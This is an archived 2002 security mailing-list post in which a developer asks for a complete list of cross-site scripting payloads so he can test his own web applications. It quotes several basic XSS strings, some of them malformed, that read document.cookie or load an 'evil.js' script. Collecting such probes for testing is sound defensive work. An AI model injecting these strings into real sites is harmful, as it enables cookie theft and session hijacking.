<a href="http://g.adspeed.net/ad.php?do=clk&zid=14678&wd=728&ht=90&pair=as" target="_top"><img style="border:0px;" src="http://g.adspeed.net/ad.php?do=img&zid=14678&wd=728&ht=90&pair=as" alt="i" width="728" height="90"/></a>

Nmap Security Scanner

Docs
Security Lists

Full Disclosure

More
Security Tools

Packet crafters

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

edgeos network security services platform

WebApp Sec: XSS Strings

XSS Strings

From: <securityarchitect_at_hush.com>
Date: Sun, 15 Dec 2002 23:54:52 -0800

Maybe more for vuln-dev but I have bitten the bullet and pulled out wget and perl and am gonna start testing my apps for XSS and I need to build the ultimate list of payloads.

For the html tags period I guess its the classic;

<script>alert(document.cookie)</script>
<a href="X" onmouseover="alert(document.cookie">
<javascript ="http://www.host/script.js"
"javascript:alert(document.cookie)"
<iframe = c:\>
<img src = "evil.js">

But I seem to recall some old versions of Netscape run the { etc

Does anyone have a good list of payloads that will cover the majority of the options ?

Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2

Big $$$ to be made with the HushMail Affiliate Program:
https://www.hushmail.com/about.php?subloc=affiliate&l=427
Received on Dec 16 2002

This message: [ Message body ]
Next message: Martin Eiszner: "Re: XSS Strings"
Previous message: HarryM: "Re: XSS"
Next in thread: Martin Eiszner: "Re: XSS Strings"
Reply: Martin Eiszner: "Re: XSS Strings"
Reply: Jeroen Latour: "Re: XSS Strings"
Reply: Glyn: "RE: XSS Strings"
Reply: Tomas: "Re: XSS Strings"

Contemporary messages sorted: [ by date ] [ by thread ] [ by subject ] [ by author ] [ by messages with attachments ]

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]